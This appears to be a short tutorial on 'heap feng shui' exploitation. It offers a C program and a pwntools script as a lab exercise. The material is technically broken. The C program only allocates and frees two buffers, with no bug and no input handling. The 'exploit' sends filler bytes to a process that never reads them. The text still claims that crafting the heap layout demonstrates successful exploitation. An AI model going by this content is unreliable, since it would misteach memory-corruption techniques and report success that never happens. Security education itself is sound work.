Heap Feng Shui Exploitation Lab

Heap Feng Shui Exploitation Lab

In this lab, we will craft heap layouts to exploit memory corruption vulnerabilities.

Lab Activities:

1. Creating Vulnerable C Program:

First, let's create a vulnerable C program with a memory corruption vulnerability.

  #include <stdio.h>
  #include <stdlib.h>

  void vulnerable_function() {
      char *ptr1 = (char *)malloc(64);
      char *ptr2 = (char *)malloc(64);
      if (ptr1 != NULL && ptr2 != NULL) {
          free(ptr1);
          free(ptr2);
      }
  }

  int main() {
      vulnerable_function();
      return 0;
  }
  

Save the above code to a file named vulnerable.c and compile it with the following command:

$ gcc -o vulnerable vulnerable.c

2. Writing Exploit Script:

Now, let's write an exploit script in Python using pwntools to craft heap layouts for exploitation.

  from pwn import *

  # Specify the path to the vulnerable binary
  binary_path = './vulnerable'

  # Craft the heap layout
  heap_layout = [
      b'A' * 64,  # Fill first allocation
      b'B' * 64   # Fill second allocation
  ]

  # Payload with crafted heap layout
  payload = b''.join(heap_layout)

  # Launch the exploit
  p = process(binary_path)
  p.send(payload)
  p.close()
  

Explanation of the Python script:

• We specify the path to the vulnerable binary and craft the heap layout with specific patterns for each allocation.
• The payload consists of the crafted heap layout.
• We launch the vulnerable binary and send the payload to exploit the memory corruption vulnerability using heap feng shui techniques.

3. Exploiting the Vulnerability:

Execute the Python script to exploit the memory corruption vulnerability:

$ python exploit.py

Once executed, the exploit will craft the heap layout and attempt to trigger the memory corruption vulnerability, demonstrating successful exploitation using heap feng shui techniques.